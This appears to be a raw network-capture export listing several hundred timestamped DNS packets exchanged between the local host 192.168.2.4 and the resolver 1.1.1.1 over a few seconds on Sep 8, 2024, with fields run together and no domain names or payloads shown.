                                                                                                                                                                                                            Sep 8, 2024 09:00:07.467317104 CEST5832853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.467562914 CEST6276353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.467844009 CEST5880253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.472284079 CEST5054853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.472539902 CEST5161453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.472759008 CEST6390253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.472910881 CEST5150553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473056078 CEST5884153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473229885 CEST5762353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473560095 CEST5882453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473788977 CEST5152753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473969936 CEST6262653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.474693060 CEST53588021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.474760056 CEST6248253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.475267887 CEST5611753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.475622892 CEST6111253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.476222038 CEST6496953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.477535963 CEST6044653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.478005886 CEST53542521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.479324102 CEST53627631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.479708910 CEST53583281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.482161045 CEST53516141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.482913017 CEST53569131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.483288050 CEST53515051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.483314037 CEST53570421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.484304905 CEST53588241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.484415054 CEST53626261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.486229897 CEST53649691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.486556053 CEST4986153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.486825943 CEST6404853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.486933947 CEST53611121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.487881899 CEST5756953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.488744020 CEST53505481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.492166042 CEST53515271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.493072033 CEST53561171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.493911982 CEST53604461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.496099949 CEST53640481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.497550011 CEST6281353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.497946024 CEST53575691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.497963905 CEST5016553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.498974085 CEST5336953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499182940 CEST5848753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499368906 CEST5434753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499463081 CEST6070053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499600887 CEST6317653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499754906 CEST5457053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499783039 CEST5243253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499954939 CEST6299953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500107050 CEST4948353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500293016 CEST6464453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500477076 CEST6064353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500796080 CEST6386853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500956059 CEST5076053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501152992 CEST4976053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501293898 CEST6280753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501862049 CEST6014653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.502335072 CEST53498611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.503151894 CEST53639021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504173040 CEST6352853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504513025 CEST5721153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504785061 CEST6091153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504960060 CEST5846653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.505037069 CEST53588411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.505572081 CEST5807753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506097078 CEST5103753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506112099 CEST5279353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506716013 CEST6099453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506725073 CEST53624821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506925106 CEST5993053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.507002115 CEST53628131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.508929968 CEST53524321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.509043932 CEST53545701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.509447098 CEST53606431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.510037899 CEST53494831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.510524988 CEST53507601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.510620117 CEST53628071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.510914087 CEST53601461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.513241053 CEST4984053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.514034033 CEST53501651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.514945030 CEST53607001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.515173912 CEST53584871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.515239000 CEST53580771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.515338898 CEST53584661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.516561031 CEST53533691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.516573906 CEST53629991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.516583920 CEST53638681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.516886950 CEST53609941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.517738104 CEST53497601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.520045996 CEST53609111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.520056963 CEST53635281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.521413088 CEST53572111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.530006886 CEST53543471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.532464981 CEST5176253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.532715082 CEST5377053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.536758900 CEST53527931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.537153959 CEST53510371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.538944960 CEST53599301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.541325092 CEST5613553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.541781902 CEST53517621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.542001963 CEST53537701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.544831038 CEST53498401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.551628113 CEST53561351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.644414902 CEST53576231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.658968925 CEST53646441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.688709021 CEST53631761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.205847025 CEST4967953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.206372023 CEST4984153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.215909004 CEST53496791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.215930939 CEST53498411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.264537096 CEST5335453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.265037060 CEST6101153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.274019957 CEST53610111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.274214983 CEST53533541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.320461035 CEST5864953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.321307898 CEST5444553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.321723938 CEST5104953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.322669983 CEST6215053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.323118925 CEST5142453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.323853970 CEST6245253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.324640036 CEST5822253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.325479984 CEST6329353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.325956106 CEST5078053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.326291084 CEST6302053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.327039003 CEST6253153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.327441931 CEST6369153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.328145981 CEST5621953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.328774929 CEST6001853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.329438925 CEST5549553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.330245972 CEST53586491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.330265999 CEST5182253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.330899000 CEST5033453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.331002951 CEST53544451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.331628084 CEST5751853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.331717014 CEST53510491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.332161903 CEST5467953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.332742929 CEST5320353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.333103895 CEST5826653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.333226919 CEST53621501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.333652020 CEST53582221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.334465981 CEST53514241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.335374117 CEST53630201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.337188005 CEST53636911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.338495016 CEST53562191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.338824034 CEST53600181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.338920116 CEST53554951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.339553118 CEST53518221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.341712952 CEST53575181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.342557907 CEST53532031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.344074965 CEST53625311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.347846985 CEST6281653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.348187923 CEST53546791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.348282099 CEST53582661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.348313093 CEST5557453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.348619938 CEST4950053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.349128008 CEST5876353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.349817038 CEST5635353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350105047 CEST5439553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350368023 CEST5103753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350599051 CEST5376853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.351074934 CEST4919153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.351635933 CEST5708253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352152109 CEST5241553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352705956 CEST5782253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352983952 CEST4989553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354161978 CEST5043053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354547977 CEST5391753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354830027 CEST5694053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354854107 CEST53624521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.355128050 CEST6384853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.355746984 CEST53632931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.357017994 CEST5226053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.357249022 CEST53628161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.357259035 CEST53507801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.357856989 CEST53587631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.358328104 CEST53555741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.359750032 CEST53537681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.360832930 CEST6313953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.360970020 CEST53510371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361110926 CEST6393553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361130953 CEST53570821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361145973 CEST53491911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361299038 CEST6360253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361856937 CEST5167253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.362166882 CEST53578221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.362461090 CEST53524151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.363137007 CEST6243453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.363225937 CEST53498951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.363646984 CEST4950453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.364552975 CEST53539171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.364563942 CEST53569401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.364573002 CEST53504301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.364722967 CEST53495001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.365184069 CEST53543951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.370637894 CEST5842453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.371109962 CEST53639351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.371373892 CEST53631391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.371507883 CEST53638481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.373497963 CEST53624341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.374372959 CEST53495041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.379940033 CEST53584241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.380317926 CEST53563531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.380827904 CEST53516721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.391793013 CEST53636021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.396419048 CEST5981353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.397888899 CEST4992353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398355007 CEST6034053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398705006 CEST5129553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398922920 CEST6146453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399169922 CEST5515253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399334908 CEST5660553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399725914 CEST5266153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399893999 CEST6019853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.400285959 CEST5539753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.400449991 CEST5808253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.406407118 CEST53598131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.406924963 CEST53499231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.408077955 CEST53614641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.408184052 CEST53566051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.408369064 CEST53512951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.408890009 CEST6073853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.409446955 CEST53601981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.409456968 CEST53526611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.409749031 CEST6088653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.411005020 CEST6016053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.414048910 CEST53551521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.414566994 CEST53603401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.416068077 CEST53553971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.416332960 CEST53580821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.419203043 CEST53607381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.419219971 CEST53608861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.420830965 CEST53601601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.485739946 CEST53503341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.528944016 CEST53522601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.046753883 CEST6096053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.048801899 CEST5892253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.049343109 CEST5744753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.050534010 CEST6389853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.050915003 CEST5273753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.052118063 CEST5330553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.052680016 CEST5795053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.054285049 CEST5677553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.055013895 CEST5238653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.055982113 CEST6181853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.056137085 CEST5711153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.056426048 CEST5734253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.056516886 CEST4999053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.057233095 CEST5164753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.057549953 CEST6437453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.057562113 CEST5905353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.057967901 CEST5418653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.065710068 CEST5532353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.071218014 CEST5679953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.071331978 CEST6546853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.071739912 CEST5345553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.071930885 CEST6115453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.072345018 CEST5906153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.072706938 CEST6254953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.072911978 CEST5575553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.073409081 CEST5473753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.073683023 CEST5180653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.073935986 CEST6520753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.074218035 CEST5500553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.074605942 CEST6201853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.074786901 CEST6342053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.075156927 CEST5086453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.075411081 CEST5115353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.075743914 CEST6366653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.076025009 CEST5311653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.076538086 CEST5572553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.076654911 CEST5484253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.078494072 CEST6365753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.080528021 CEST6177553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.080651999 CEST5375853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.081211090 CEST6316353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.082920074 CEST5363753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.083825111 CEST5682253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.084388971 CEST6414153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.092412949 CEST6427653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.093590975 CEST6503953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.093859911 CEST5846553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.094271898 CEST5723353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.094613075 CEST5771053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.094957113 CEST6250253192.168.2.41.1.1.1
